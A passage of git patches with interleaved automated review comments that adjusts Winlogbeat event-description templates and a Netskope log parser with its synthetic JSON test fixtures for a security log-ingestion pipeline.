From: LenaigKaliou Date: Tue, 19 Nov 2024 09:44:23 +0100 Subject: [PATCH 058/150] small fixes on conditions --- .../winlogbeat/_meta/smart-descriptions.json | 108 +++++++++++++++++- 1 file changed, 105 insertions(+), 3 deletions(-) diff --git a/Beats/winlogbeat/_meta/smart-descriptions.json b/Beats/winlogbeat/_meta/smart-descriptions.json index b720b4ffb..d3979925e 100644 --- a/Beats/winlogbeat/_meta/smart-descriptions.json +++ b/Beats/winlogbeat/_meta/smart-descriptions.json @@ -205,6 +205,35 @@ } ] }, + { + "value": "{action.properties.SubjectDomainName}\\{action.properties.SubjectUserName} logged on to {host.name} with special privileges", + "relationships": [ + { + "source": "user.name", + "target": "host.name", + "type": "logged on to" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4672 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "action.properties.SubjectDomainName" + }, + { + "field": "action.properties.SubjectuserName" + }, + { + "field": "host.name" + } + ] + }, { "value": "{user.domain}\\{user.name} logged on to {host.name} with special privileges", "relationships": [ @@ -222,6 +251,15 @@ { "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "user.domain" + }, + { + "field": "user.name" + }, + { + "field": "host.name" } ] }, @@ -726,7 +764,7 @@ "value": "Microsoft-Windows-Security-Auditing" }, { - "field":"host.hostname" + "field": "host.hostname" } ] }, @@ -802,7 +840,7 @@ "value": "Microsoft-Windows-Security-Auditing" }, { - "field":"host.hostname" + "field": "host.hostname" } ] }, @@ -853,7 +891,7 @@ "field": "source.ip" }, { - "field":"host.hostname" + "field": "host.hostname" } ] }, 
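Review bot: In the first hunk (`@@ -205,6 +205,35 @@`) the new 4672 entry's last-but-one condition is `"field": "action.properties.SubjectuserName"` (lowercase `u`), while the `value` template reads `{action.properties.SubjectUserName}`; if field paths are matched case-sensitively, as they appear to be elsewhere in this file, this condition never holds and the whole description is dead, and if it were relaxed the placeholder would be unguarded. The fix is `"field": "action.properties.SubjectUserName"`. Separately, the `relationships` block of that entry uses `user.name` as the source while the text is built from `action.properties.*`; the other added entries pair the relationship fields with the fields they condition on, so this one may be worth aligning, though I cannot tell from the hunk whether relationships must use ECS paths.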
@@ -1068,6 +1106,58 @@ } ] }, + { + "value": "{host.hostname} allowed a connection from {action.properties.SourceAddress}:{action.properties.SourcePort}", + "relationships": [ + { + "source": "action.properties.SourceAddress", + "target": "action.properties.DestAddress", + "type": "connected to" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 5156 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "action.properties.SourceAddress" + }, + { + "field": "action.properties.SourcePort" + } + ] + }, + { + "value": "{host.hostname} allowed a connection to {action.properties.DestAdress}:{action.properties.DestPort}", + "relationships": [ + { + "source": "action.properties.SourceAddress", + "target": "action.properties.DestAddress", + "type": "connected to" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 5156 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "action.properties.DestAddress" + }, + { + "field": "action.properties.DestPort" + } + ] + }, { "value": "{host.hostname} allowed a connection from {action.properties.SourceAddress}:{action.properties.SourcePort} to {action.properties.DestAdress}:{action.properties.DestPort}", "relationships": [ @@ -1085,6 +1175,18 @@ { "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "action.properties.SourceAddress" + }, + { + "field": "action.properties.DestAddress" + }, + { + "field": "action.properties.SourcePort" + }, + { + "field": "action.properties.DestPort" } ] }, From 2207f3078290450fbbbcfe9b4584bf68d7a3fb49 Mon Sep 17 00:00:00 2001 From: LenaigKaliou Date: Tue, 19 Nov 2024 09:47:15 +0100 Subject: [PATCH 059/150] fixing typo --- Beats/winlogbeat/_meta/smart-descriptions.json | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) 
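Review bot: In the first added 5156 entry the relationship names `action.properties.DestAddress` as its target, but the `conditions` only require `action.properties.SourceAddress` and `action.properties.SourcePort`, so an event that selects this description (the variant lacking a destination) has a relationship pointing at a field that is presumably absent; the second added entry mirrors the problem with `action.properties.SourceAddress` as source while only the `Dest*` fields are required. Either each variant's relationship should be restricted to the endpoints it guarantees, or the missing field should be added as a condition, e.g. `{ "field": "action.properties.DestAddress" }` in the first entry, which would however collapse it into the third, fully-qualified entry extended by the `@@ -1085` hunk. I cannot see from the hunk how the consumer treats a relationship whose endpoint is missing, so the safer option is to drop the relationship from the two partial variants.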
diff --git a/Beats/winlogbeat/_meta/smart-descriptions.json b/Beats/winlogbeat/_meta/smart-descriptions.json index d3979925e..1d8547db9 100644 --- a/Beats/winlogbeat/_meta/smart-descriptions.json +++ b/Beats/winlogbeat/_meta/smart-descriptions.json @@ -1133,7 +1133,7 @@ ] }, { - "value": "{host.hostname} allowed a connection to {action.properties.DestAdress}:{action.properties.DestPort}", + "value": "{host.hostname} allowed a connection to {action.properties.DestAddress}:{action.properties.DestPort}", "relationships": [ { "source": "action.properties.SourceAddress", @@ -1159,7 +1159,7 @@ ] }, { - "value": "{host.hostname} allowed a connection from {action.properties.SourceAddress}:{action.properties.SourcePort} to {action.properties.DestAdress}:{action.properties.DestPort}", + "value": "{host.hostname} allowed a connection from {action.properties.SourceAddress}:{action.properties.SourcePort} to {action.properties.DestAddress}:{action.properties.DestPort}", "relationships": [ { "source": "action.properties.SourceAddress", From 6abd31bb9209f77aab598e290a7c8370a98a67ff Mon Sep 17 00:00:00 2001 
From: LenaigKaliou Date: Tue, 19 Nov 2024 10:55:07 +0100 Subject: [PATCH 060/150] Fixes on Netskope format --- Netskope/netskope_events/ingest/parser.yml | 5 +- .../test_audit_log_deleted_inline_policy.json | 1 + .../test_audit_log_edit_admin_record.json | 1 + .../tests/test_audit_log_login_failed.json | 1 + .../test_audit_log_login_successful.json | 1 + .../test_audit_log_logout_successful.json | 1 + ..._audit_log_password_change_successful.json | 1 + .../tests/test_connection_log.json | 1 + .../tests/test_dlp_incident.json | 3 +- .../tests/test_malware_alert.json | 5 +- .../tests/test_nspolicy_block.json | 109 ++++++++++++++++ .../tests/test_nspolicy_log.json | 3 +- .../tests/test_nspolicy_upload.json | 120 ++++++++++++++++++ .../tests/test_user_alert.json | 2 +- 14 files changed, 248 insertions(+), 6 deletions(-) create mode 100644 Netskope/netskope_events/tests/test_nspolicy_block.json create mode 100644 Netskope/netskope_events/tests/test_nspolicy_upload.json diff --git a/Netskope/netskope_events/ingest/parser.yml b/Netskope/netskope_events/ingest/parser.yml index 1c33c07bc..7ce3a2543 100644 --- a/Netskope/netskope_events/ingest/parser.yml +++ b/Netskope/netskope_events/ingest/parser.yml @@ -36,7 +36,7 @@ stages: "@timestamp": "{{parse_date.datetime}}" observer.vendor: "Netskope" event.dataset: "{{parsed_event.message.type}}" - event.action: "{{parsed_event.message.activity}}" + event.action: "{{parsed_event.message.action or parsed_event.message.activity or 'Allow'}}" event.reason: "{{parsed_event.message.audit_log_event or parsed_event.message.bypass_reason}}" event.duration: "{{parsed_event.message.conn_duration}}" user_agent.original: "{{parsed_event.message.user_agent}}" 
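Review bot: The new `event.action: "{{parsed_event.message.action or parsed_event.message.activity or 'Allow'}}"` applies the `'Allow'` default to every event type, and the fixtures updated in this same patch show the consequence: `test_audit_log_login_failed.json` now expects `"action": "Allow"` on a "Login Failed" `admin_audit_logs` record, and the logout, password-change and configuration audit logs get the same verdict. An allow verdict on a failed authentication is misleading for any detection rule or triage view keyed on `event.action`, and it differs from the old behaviour (field absent). Keep the first line as `event.action: "{{parsed_event.message.action or parsed_event.message.activity}}"` and apply the default in a separate stage restricted to the types where a missing action genuinely means the traffic was allowed, e.g. `filter: "{{parsed_event.message.type != 'admin_audit_logs' and not parsed_event.message.action and not parsed_event.message.activity}}"`; which types qualify beyond `connection` is not visible from the hunk. The enclosing `set` stage continues outside the hunk.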
@@ -92,6 +92,9 @@ stages: - set: file.path: "{{parsed_event.message.file_path}}" filter: '{{parsed_event.message.file_path not in [None, "", "NA"]}}' + - set: + file.size: "{{parsed_event.message.file_size}}" + filter: "{{parsed_event.message.file_size not in [None, 0]}}" - translate: dictionary: "yes": "alert" diff --git a/Netskope/netskope_events/tests/test_audit_log_deleted_inline_policy.json b/Netskope/netskope_events/tests/test_audit_log_deleted_inline_policy.json index 67944d71d..df70ea26e 100644 --- a/Netskope/netskope_events/tests/test_audit_log_deleted_inline_policy.json +++ b/Netskope/netskope_events/tests/test_audit_log_deleted_inline_policy.json @@ -5,6 +5,7 @@ "expected": { "message": "{\n \"timestamp\": 1651451341,\n \"type\": \"admin_audit_logs\",\n \"user\": \"john.doe@example.org\",\n \"severity_level\": 2,\n \"audit_log_event\": \"Deleted inline policy\",\n \"supporting_data\": {\n \"data_type\": \"policy\",\n \"data_values\": [\n false\n ]\n },\n \"organization_unit\": \"\",\n \"ur_normalized\": \"john.doe@example.org\",\n \"ccl\": \"unknown\",\n \"count\": 1,\n \"_id\": \"acfa7348-64c5-40de-b28d-202c8362d0f7\",\n \"userPrincipalName\": \"\",\n \"sAMAccountName\": \"\"\n}\n", "event": { + "action": "Allow", "category": [ "configuration" ], diff --git a/Netskope/netskope_events/tests/test_audit_log_edit_admin_record.json b/Netskope/netskope_events/tests/test_audit_log_edit_admin_record.json index 79f08033a..10b406a5f 100644 --- a/Netskope/netskope_events/tests/test_audit_log_edit_admin_record.json +++ b/Netskope/netskope_events/tests/test_audit_log_edit_admin_record.json 
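Review bot: The added `file.size` stage filters on `{{parsed_event.message.file_size not in [None, 0]}}`, while the `file.path` stage directly above it also excludes `""` and `"NA"`; the Netskope fixtures in this patch emit many absent fields as empty strings (`"useragent": ""`, `"device": ""` in `test_connection_log.json`), so if `file_size` is ever emitted the same way the template would write an empty string into a field consumers expect to be a long. Aligning the guard with its sibling costs nothing: `filter: '{{parsed_event.message.file_size not in [None, 0, "", "NA"]}}'`. I cannot confirm from the hunk whether Netskope ever sends `file_size` as a string, so this is defensive rather than a reproduced failure. The enclosing `stages:` list continues outside the hunk.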
@@ -5,6 +5,7 @@ "expected": { "message": "{\n \"timestamp\": 1651489787,\n \"type\": \"admin_audit_logs\",\n \"user\": \"john.doe@example.org\",\n \"severity_level\": 1,\n \"audit_log_event\": \"Edit admin record\",\n \"supporting_data\": {\n \"data_type\": \"admin\",\n \"data_values\": [\n \"admin@example.org\"\n ]\n },\n \"organization_unit\": \"\",\n \"ur_normalized\": \"john.doe@example.org\",\n \"ccl\": \"unknown\",\n \"count\": 1,\n \"_id\": \"275a263c8f8d4b7d9e12bf65b9094116\",\n \"userPrincipalName\": \"\",\n \"sAMAccountName\": \"\"\n}\n", "event": { + "action": "Allow", "category": [ "configuration" ], diff --git a/Netskope/netskope_events/tests/test_audit_log_login_failed.json b/Netskope/netskope_events/tests/test_audit_log_login_failed.json index 8a05a5c15..8a792a408 100644 --- a/Netskope/netskope_events/tests/test_audit_log_login_failed.json +++ b/Netskope/netskope_events/tests/test_audit_log_login_failed.json @@ -5,6 +5,7 @@ "expected": { "message": "{\n \"timestamp\": 1651494031,\n \"type\": \"admin_audit_logs\",\n \"user\": \"student13\",\n \"severity_level\": 1,\n \"audit_log_event\": \"Login Failed\",\n \"supporting_data\": {\n \"data_type\": \"user\",\n \"data_values\": [\n \"4.5.6.7\",\n \"student13\"\n ]\n },\n \"organization_unit\": \"\",\n \"ur_normalized\": \"student13\",\n \"ccl\": \"unknown\",\n \"count\": 1,\n \"_id\": \"60d81a80b26149b8a910dfffc48cbf41\",\n \"userPrincipalName\": \"\",\n \"sAMAccountName\": \"\"\n}\n", "event": { + "action": "Allow", "category": [ "authentication" ], diff --git a/Netskope/netskope_events/tests/test_audit_log_login_successful.json b/Netskope/netskope_events/tests/test_audit_log_login_successful.json index 1b4d67977..01549d366 100644 --- a/Netskope/netskope_events/tests/test_audit_log_login_successful.json +++ b/Netskope/netskope_events/tests/test_audit_log_login_successful.json 
@@ -5,6 +5,7 @@ "expected": { "message": "{\n \"timestamp\": 1671727087,\n \"type\": \"admin_audit_logs\",\n \"user\": \"john.doe@example.org\",\n \"severity_level\": 2,\n \"audit_log_event\": \"Login Successful\",\n \"supporting_data\": {\n \"data_type\": \"user\",\n \"data_values\": [\n \"1.2.3.4\",\n \"john.doe@example.org\"\n ]\n },\n \"organization_unit\": \"\",\n \"ur_normalized\": \"john.doe@example.org\",\n \"ccl\": \"unknown\",\n \"count\": 1,\n \"_id\": \"45b78fd638944e9ca0c6d92dfe2d4815\",\n \"userPrincipalName\": \"\",\n \"sAMAccountName\": \"\"\n}\n", "event": { + "action": "Allow", "category": [ "authentication" ], diff --git a/Netskope/netskope_events/tests/test_audit_log_logout_successful.json b/Netskope/netskope_events/tests/test_audit_log_logout_successful.json index 8b4635920..12e39be95 100644 --- a/Netskope/netskope_events/tests/test_audit_log_logout_successful.json +++ b/Netskope/netskope_events/tests/test_audit_log_logout_successful.json @@ -5,6 +5,7 @@ "expected": { "message": "{\n \"timestamp\": 1670409967,\n \"type\": \"admin_audit_logs\",\n \"user\": \"john.doe@example.org\",\n \"severity_level\": 2,\n \"audit_log_event\": \"Logout Successful\",\n \"supporting_data\": {\n \"data_type\": \"reason\",\n \"data_values\": [\n \"Logged out due to inactivity\"\n ]\n },\n \"organization_unit\": \"\",\n \"ur_normalized\": \"john.doe@example.org\",\n \"ccl\": \"unknown\",\n \"count\": 1,\n \"_id\": \"e0272abae25442f681d0dbbef65b67e9\",\n \"userPrincipalName\": \"\",\n \"sAMAccountName\": \"\"\n}\n", "event": { + "action": "Allow", "category": [ "authentication" ], diff --git a/Netskope/netskope_events/tests/test_audit_log_password_change_successful.json b/Netskope/netskope_events/tests/test_audit_log_password_change_successful.json index b06db05ac..a2fa885de 100644 --- a/Netskope/netskope_events/tests/test_audit_log_password_change_successful.json +++ b/Netskope/netskope_events/tests/test_audit_log_password_change_successful.json 
@@ -5,6 +5,7 @@ "expected": { "message": "{\n \"timestamp\": 1651489787,\n \"type\": \"admin_audit_logs\",\n \"user\": \"john.doe@example.org\",\n \"severity_level\": 1,\n \"audit_log_event\": \"Password Change Successful\",\n \"supporting_data\": {\n \"data_type\": \"user\",\n \"data_values\": [\n \"1.2.3.4\",\n \"admin@example.org\"\n ]\n },\n \"organization_unit\": \"\",\n \"ur_normalized\": \"john.doe@example.org\",\n \"ccl\": \"unknown\",\n \"count\": 1,\n \"_id\": \"47e7e59a6ffa4662be63836a0f898b16\",\n \"userPrincipalName\": \"\",\n \"sAMAccountName\": \"\"\n}\n", "event": { + "action": "Allow", "category": [ "iam" ], diff --git a/Netskope/netskope_events/tests/test_connection_log.json b/Netskope/netskope_events/tests/test_connection_log.json index 29f3c0723..5c5218356 100644 --- a/Netskope/netskope_events/tests/test_connection_log.json +++ b/Netskope/netskope_events/tests/test_connection_log.json 
@@ -5,6 +5,7 @@ "expected": { "message": "{\n \"_id\": \"69573873d4de0a4f1d2cbac4\",\n \"access_method\": \"Client\",\n \"app\": \"Swile\",\n \"appcategory\": \"HR\",\n \"bypass_reason\": \"SSL Do Not Decrypt Bypass Policy Matched\",\n \"bypass_traffic\": \"yes\",\n \"category\": \"HR\",\n \"cci\": 16,\n \"ccl\": \"poor\",\n \"connection_id\": 0,\n \"count\": 1,\n \"domain\": \"test.example.org\",\n \"dst_country\": \"FR\",\n \"dst_geoip_src\": 1,\n \"dst_latitude\": 48.85836410522461,\n \"dst_location\": \"Paris\",\n \"dst_longitude\": 2.294532060623169,\n \"dst_region\": \"Ile-de-France\",\n \"dst_timezone\": \"Europe/Paris\",\n \"dst_zipcode\": \"N/A\",\n \"dstip\": \"5.6.7.8\",\n \"dstport\": 443,\n \"netskope_pop\": \"FR-PAR1\",\n \"organization_unit\": \"\",\n \"other_categories\": [\n \"Finance/Accounting\",\n \"All Categories\",\n \"HR\"\n ],\n \"page\": \"test.example.org\",\n \"policy\": \"bypass_ssl for regulation purpose\",\n \"request_id\": 1111111111111111111,\n \"site\": \"Swile\",\n \"src_country\": \"FR\",\n \"src_geoip_src\": 2,\n \"src_latitude\": 48.11,\n \"src_location\": \"Rennes\",\n \"src_longitude\": -1.6744,\n \"src_region\": \"Brittany\",\n \"src_time\": \"Wed Dec 21 17:12:00 2022\",\n \"src_timezone\": \"Europe/Paris\",\n \"src_zipcode\": \"35000\",\n \"srcip\": \"4.5.6.7\",\n \"ssl_decrypt_policy\": \"yes\",\n \"timestamp\": 1671639140,\n \"traffic_type\": \"CloudApp\",\n \"transaction_id\": 0,\n \"type\": \"connection\",\n \"ur_normalized\": \"john.doe@example.org\",\n \"url\": \"test.example.org\",\n \"user\": \"john.doe@example.org\",\n \"user_generated\": \"yes\",\n \"userip\": \"1.2.3.4\",\n \"userkey\": \"john.doe@example.org\",\n \"org\": \"\",\n \"http_transaction_count\": 0,\n \"network\": \"\",\n \"useragent\": \"\",\n \"dsthost\": \"\",\n \"numbytes\": 0,\n \"CononicalName\": \"\",\n \"os_version\": \"\",\n \"browser_session_id\": 0,\n \"resp_cnt\": 0,\n \"log_file_name\": \"\",\n \"suppression_end_time\": 0,\n 
\"browser_version\": \"\",\n \"severity\": \"\",\n \"client_bytes\": 0,\n \"suppression_start_time\": 0,\n \"app_session_id\": 0,\n \"sAMAccountName\": \"\",\n \"req_cnt\": 0,\n \"device\": \"\",\n \"browser\": \"\",\n \"userPrincipalName\": \"\",\n \"conn_endtime\": 1671639139,\n \"conn_duration\": 3,\n \"protocol\": \"\",\n \"fromlogs\": \"\",\n \"serial\": \"\",\n \"resp_content_len\": 0,\n \"dynamic_classification\": \"\",\n \"hostname\": \"\",\n \"os\": \"\",\n \"server_bytes\": 0,\n \"conn_starttime\": 1671639136,\n \"sessionid\": \"\",\n \"resp_content_type\": \"\"\n}\n", "event": { + "action": "Allow", "category": [ "network" ], diff --git a/Netskope/netskope_events/tests/test_dlp_incident.json b/Netskope/netskope_events/tests/test_dlp_incident.json index 66c901c90..37ab6e32b 100644 --- a/Netskope/netskope_events/tests/test_dlp_incident.json +++ b/Netskope/netskope_events/tests/test_dlp_incident.json @@ -30,7 +30,8 @@ "hash": { "md5": "68b329da9893e34099c7d8ad5cb9c940" }, - "mime_type": "eicar.txt" + "mime_type": "eicar.txt", + "size": 19154 }, "http": { "request": { diff --git a/Netskope/netskope_events/tests/test_malware_alert.json b/Netskope/netskope_events/tests/test_malware_alert.json index 63497504d..5e5f6de15 100644 --- a/Netskope/netskope_events/tests/test_malware_alert.json +++ b/Netskope/netskope_events/tests/test_malware_alert.json 
@@ -5,7 +5,7 @@ "expected": { "message": "{\n \"_id\": \"882049056ee9e069c1c329b7\",\n \"access_method\": \"Client\",\n \"action\": \"Detection\",\n \"activity\": \"Download\",\n \"alert\": \"yes\",\n \"alert_type\": \"Malware\",\n \"app\": \"eicar\",\n \"app_session_id\": 111111111111111111,\n \"appcategory\": \"n/a\",\n \"browser\": \"Safari\",\n \"category\": \"n/a\",\n \"cci\": \"\",\n \"ccl\": \"unknown\",\n \"connection_id\": 0,\n \"count\": 1,\n \"device\": \"Mac Device\",\n \"dst_country\": \"US\",\n \"dst_geoip_src\": 2,\n \"dst_latitude\": 47.6711,\n \"dst_location\": \"Redmond\",\n \"dst_longitude\": -122.1253,\n \"dst_region\": \"Washington\",\n \"dst_timezone\": \"America/Los_Angeles\",\n \"dst_zipcode\": \"98073\",\n \"dstip\": \"5.6.7.8\",\n \"file_path\": \"NA\",\n \"file_size\": 308,\n \"file_type\": \"File Type Not Detected\",\n \"hostname\": \"MacBook Pro\",\n \"instance\": null,\n \"managementID\": \"99999999999999999999999999999999\",\n \"md5\": \"68b329da9893e34099c7d8ad5cb9c940\",\n \"mime_type\": \"\",\n \"nsdeviceuid\": \"BC848089-186A-4F2D-A26F-E5CC94C29E56\",\n \"object\": \"eicarcom2.zip\",\n \"object_id\": \"68b329da9893e34099c7d8ad5cb9c940\",\n \"object_type\": \"File\",\n \"organization_unit\": \"\",\n \"os\": \"Monterey\",\n \"referer\": \"https://www.eicar.org/\",\n \"request_id\": 2222222222222222222,\n \"severity\": \"high\",\n \"site\": \"eicar\",\n \"src_country\": \"FR\",\n \"src_geoip_src\": 2,\n \"src_latitude\": 48.11,\n \"src_location\": \"Rennes\",\n \"src_longitude\": -1.6744,\n \"src_region\": \"Brittany\",\n \"src_timezone\": \"Europe/Paris\",\n \"src_zipcode\": \"35000\",\n \"srcip\": \"4.3.2.1\",\n \"timestamp\": 1671631928,\n \"title\": \"eicarcom2.zip\",\n \"traffic_type\": \"CloudApp\",\n \"transaction_id\": 3333333333333333333,\n \"tss_mode\": \"inline\",\n \"type\": \"nspolicy\",\n \"ur_normalized\": \"john.doe@example.org\",\n \"url\": \"secure.eicar.org/eicarcom2.zip\",\n \"user\": \"john.doe@example.org\",\n 
\"user_id\": \"john.doe@example.org\",\n \"userip\": \"1.2.3.4\",\n \"userkey\": \"john.doe@example.org\",\n \"dlp_file\": \"\",\n \"data_center\": \"\",\n \"browser_version\": \"\",\n \"owner\": \"\",\n \"dlp_incident_id\": 0,\n \"channel_id\": \"\",\n \"from_user_category\": \"\",\n \"resp_cnt\": 0,\n \"suppression_key\": \"\",\n \"loginurl\": \"\",\n \"total_collaborator_count\": 0,\n \"os_version\": \"\",\n \"dlp_rule\": \"\",\n \"dlp_mail_parent_id\": \"\",\n \"instance_id\": \"\",\n \"to_user\": \"\",\n \"suppression_end_time\": 0,\n \"fromlogs\": \"\",\n \"dlp_parent_id\": 0,\n \"dstport\": 0,\n \"dst_timezone\": \"\",\n \"serial\": \"\",\n \"audit_category\": \"\",\n \"sha256\": \"\",\n \"from_user\": \"\",\n \"sAMAccountName\": \"\",\n \"app_activity\": \"\",\n \"useragent\": \"\",\n \"netskope_activity\": \"\",\n \"conn_duration\": 0,\n \"other_categories\": [],\n \"custom_connector\": \"\",\n \"dlp_rule_severity\": \"\",\n \"numbytes\": 0,\n \"telemetry_app\": \"\",\n \"true_obj_category\": \"\",\n \"userPrincipalName\": \"\",\n \"logintype\": \"\",\n \"suppression_start_time\": 0,\n \"browser_session_id\": 0,\n \"dlp_profile\": \"\",\n \"src_time\": \"\",\n \"modified\": 0,\n \"policy\": \"\",\n \"policy_id\": \"\",\n \"notify_template\": \"\",\n \"audit_type\": \"\",\n \"orignal_file_path\": \"\",\n \"dlp_is_unique_count\": \"\",\n \"org\": \"\",\n \"user_category\": \"\",\n \"dlp_unique_count\": 0,\n \"exposure\": \"\",\n \"netskope_pop\": \"\",\n \"shared_with\": \"\",\n \"client_bytes\": 0,\n \"sanctioned_instance\": \"\",\n \"device_classification\": \"\",\n \"data_type\": \"\",\n \"scan_type\": \"\",\n \"internal_collaborator_count\": 0,\n \"CononicalName\": \"\",\n \"workspace\": \"\",\n \"log_file_name\": \"\",\n \"parent_id\": \"\",\n \"true_obj_type\": \"\",\n \"dlp_rule_count\": 0,\n \"sessionid\": \"\",\n \"workspace_id\": \"\",\n \"page_site\": \"\",\n \"universal_connector\": \"\",\n \"server_bytes\": 0,\n \"req_cnt\": 0,\n \"file_lang\": 
\"\",\n \"protocol\": \"\",\n \"web_universal_connector\": \"\",\n \"dsthost\": \"\",\n \"appsuite\": \"\",\n \"managed_app\": \"\",\n \"page\": \"\"\n}\n", "event": { - "action": "Download", + "action": "Detection", "category": [ "malware" ], @@ -36,7 +36,8 @@ "hash": { "md5": "68b329da9893e34099c7d8ad5cb9c940" }, - "name": "eicarcom2.zip" + "name": "eicarcom2.zip", + "size": 308 }, "host": { "name": "MacBook Pro", diff --git a/Netskope/netskope_events/tests/test_nspolicy_block.json b/Netskope/netskope_events/tests/test_nspolicy_block.json new file mode 100644 index 000000000..0d739d4fd --- /dev/null +++ b/Netskope/netskope_events/tests/test_nspolicy_block.json 
@@ -0,0 +1,109 @@ +{ + "input": { + "message": "{\"_id\":\"55093de1d7b4571d8941f492\",\"access_method\":\"Client\",\"action\":\"block\",\"activity\":\"Browse\",\"alert\":\"yes\",\"app\":\"DNS Over HTTPS\",\"app_session_id\":1234567890,\"appcategory\":\"General\",\"browser\":\"Chrome\",\"browser_session_id\":2222222222222,\"category\":\"General\",\"cci\":\"\",\"ccl\":\"unknown\",\"connection_id\":0,\"count\":1,\"device\":\"Windows Device\",\"device_classification\":\"unmanaged\",\"dst_country\":\"US\",\"dst_latitude\":37.775699615478516,\"dst_location\":\"San Francisco\",\"dst_longitude\":-122.39520263671875,\"dst_region\":\"California\",\"dst_timezone\":\"America/Los_Angeles\",\"dst_zipcode\":\"N/A\",\"dstip\":\"1.2.3.4\",\"dstport\":443,\"hostname\":\"PC-HOST01\",\"ja3\":\"1234567890abcdef1234567890abcdef\",\"ja3s\":\"NotAvailable\",\"managed_app\":\"no\",\"netskope_pop\":\"FR-PAR2\",\"notify_template\":\"silent_block.html\",\"organization_unit\":\"\",\"os\":\"Windows 11\",\"os_version\":\"Windows NT 11.0\",\"other_categories\":[\"Technology\",\"General\"],\"page\":\"test.example.com\",\"page_site\":\"test\",\"policy\":\"Block DoH - incompatibility with Netskope\",\"policy_id\":\"99999999999999999999999999999999 2024-10-30 13:52:18.401518\",\"protocol\":\"HTTPS/1.1\",\"request_id\":444444444444444444,\"severity\":\"unknown\",\"site\":\"DOH\",\"src_country\":\"FR\",\"src_latitude\":48.8323,\"src_location\":\"Paris\",\"src_longitude\":2.4075,\"src_region\":\"\u00cele-de-France\",\"src_time\":\"Thu Nov 14 10:01:00 
2024\",\"src_timezone\":\"Europe/Paris\",\"src_zipcode\":\"75018\",\"srcip\":\"5.6.7.8\",\"telemetry_app\":\"\",\"timestamp\":1731574892,\"traffic_type\":\"CloudApp\",\"transaction_id\":111111111111,\"type\":\"nspolicy\",\"ur_normalized\":\"john.doe@mail.fr\",\"url\":\"test.example.com\",\"user\":\"john.doe@mail.fr\",\"useragent\":\"Chrome\",\"userip\":\"10.20.30.40\",\"userkey\":\"john.doe@mail.fr\",\"log_file_name\":\"\",\"from_user\":\"\",\"ext_labels\":[],\"audit_type\":\"\",\"CononicalName\":\"\",\"parent_id\":\"\",\"tss_scan_failed\":\"\",\"data_center\":\"\",\"from_user_category\":\"\",\"internal_collaborator_count\":0,\"dlp_rule_severity\":\"\",\"req_cnt\":0,\"dlp_parent_id\":0,\"alert_type\":\"\",\"workspace\":\"\",\"dst_geoip_src\":0,\"user_category\":\"\",\"channel_id\":\"\",\"loginurl\":\"\",\"dlp_is_unique_count\":\"\",\"netskope_activity\":\"\",\"retro_scan_name\":\"\",\"to_user\":\"\",\"sha256\":\"\",\"justification_type\":\"\",\"fromlogs\":\"\",\"title\":\"\",\"universal_connector\":\"\",\"custom_connector\":\"\",\"modified\":0,\"user_confidence_index\":0,\"exposure\":\"\",\"orignal_file_path\":\"\",\"instance_id\":\"\",\"managementID\":\"\",\"sanctioned_instance\":\"\",\"file_lang\":\"\",\"dlp_scan_failed\":\"\",\"mime_type\":\"\",\"browser_version\":\"\",\"object_id\":\"\",\"data_type\":\"\",\"audit_category\":\"\",\"dlp_mail_parent_id\":\"\",\"file_path\":\"\",\"sAMAccountName\":\"\",\"client_bytes\":0,\"dlp_file\":\"\",\"org\":\"\",\"numbytes\":0,\"tss_fail_reason\":\"\",\"object\":\"\",\"nsdeviceuid\":\"\",\"app_activity\":\"\",\"instance\":\"\",\"userPrincipalName\":\"\",\"object_type\":\"\",\"scan_type\":\"\",\"appsuite\":\"\",\"conn_duration\":0,\"file_type\":\"\",\"dsthost\":\"\",\"logintype\":\"\",\"true_obj_type\":\"\",\"dlp_rule\":\"\",\"serial\":\"\",\"suppression_key\":\"\",\"suppression_start_time\":0,\"dlp_rule_count\":0,\"shared_with\":\"\",\"resp_cnt\":0,\"justification_reason\":\"\",\"web_universal_connector\":\"\",\"server_bytes\"
:0,\"dlp_unique_count\":0,\"md5\":\"\",\"file_size\":0,\"smtp_to\":[],\"dlp_incident_id\":0,\"true_obj_category\":\"\",\"src_geoip_src\":0,\"total_collaborator_count\":0,\"sessionid\":\"\",\"user_id\":\"\",\"custom_attr\":{},\"referer\":\"\",\"suppression_end_time\":0,\"owner\":\"\",\"tss_mode\":\"\",\"dlp_fail_reason\":\"\",\"workspace_id\":\"\",\"dlp_profile\":\"\"}", + "sekoiaio": { + "intake": { + "dialect": "Netskope", + "dialect_uuid": "de9ca004-991e-4f5c-89c5-e075f3fb3216" + } + } + }, + "expected": { + "message": "{\"_id\":\"55093de1d7b4571d8941f492\",\"access_method\":\"Client\",\"action\":\"block\",\"activity\":\"Browse\",\"alert\":\"yes\",\"app\":\"DNS Over HTTPS\",\"app_session_id\":1234567890,\"appcategory\":\"General\",\"browser\":\"Chrome\",\"browser_session_id\":2222222222222,\"category\":\"General\",\"cci\":\"\",\"ccl\":\"unknown\",\"connection_id\":0,\"count\":1,\"device\":\"Windows Device\",\"device_classification\":\"unmanaged\",\"dst_country\":\"US\",\"dst_latitude\":37.775699615478516,\"dst_location\":\"San Francisco\",\"dst_longitude\":-122.39520263671875,\"dst_region\":\"California\",\"dst_timezone\":\"America/Los_Angeles\",\"dst_zipcode\":\"N/A\",\"dstip\":\"1.2.3.4\",\"dstport\":443,\"hostname\":\"PC-HOST01\",\"ja3\":\"1234567890abcdef1234567890abcdef\",\"ja3s\":\"NotAvailable\",\"managed_app\":\"no\",\"netskope_pop\":\"FR-PAR2\",\"notify_template\":\"silent_block.html\",\"organization_unit\":\"\",\"os\":\"Windows 11\",\"os_version\":\"Windows NT 11.0\",\"other_categories\":[\"Technology\",\"General\"],\"page\":\"test.example.com\",\"page_site\":\"test\",\"policy\":\"Block DoH - incompatibility with Netskope\",\"policy_id\":\"99999999999999999999999999999999 2024-10-30 
